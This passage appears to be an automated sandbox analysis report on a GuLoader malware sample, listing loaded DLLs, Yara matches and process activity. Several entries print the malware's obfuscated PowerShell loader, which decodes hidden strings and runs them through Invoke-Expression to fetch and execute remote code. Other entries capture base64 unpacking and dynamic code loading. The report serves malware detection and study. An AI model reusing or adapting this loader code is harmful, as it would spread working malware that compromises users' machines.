              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradox", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Atombevbnes)$global:Wienerplsens = [System.Text.Encoding]::ASCII.GetString($Adhesivemeter)$global:Smithson=$Wienerplsens.substring($Arkitekttegnes,$sybaritisk)<#Fakeers Galloper Digi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kdedes $Bekldningsreglerne $Tegningslsnings221), (Erlagte @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:savbukkes = [AppDomain]::CurrentDomain.GetAssembl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Telepolitik)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Byggerettens, $false).DefineType($Indgik, $Ci
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Atombevbnes)$global:Wienerplsens = [System.Text.Encoding]::ASCII.GetString($Adhesivemeter)$global:Smithson=$Wienerplsens.substring($Arkitekttegnes,$sybaritisk)<#Fakeers Galloper Digi
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886F93414 pushfd ; iretd 9_2_00007FF886F93415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886F96FE4 pushad ; iretd 9_2_00007FF886F96FE5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886F97A4B push esi; iretd 9_2_00007FF886F97A4C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886F97D14 push ebx; iretd 9_2_00007FF886F97D15
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072108C2 push eax; mov dword ptr [esp], ecx13_2_07210AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07210AAC push eax; mov dword ptr [esp], ecx13_2_07210AC4
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
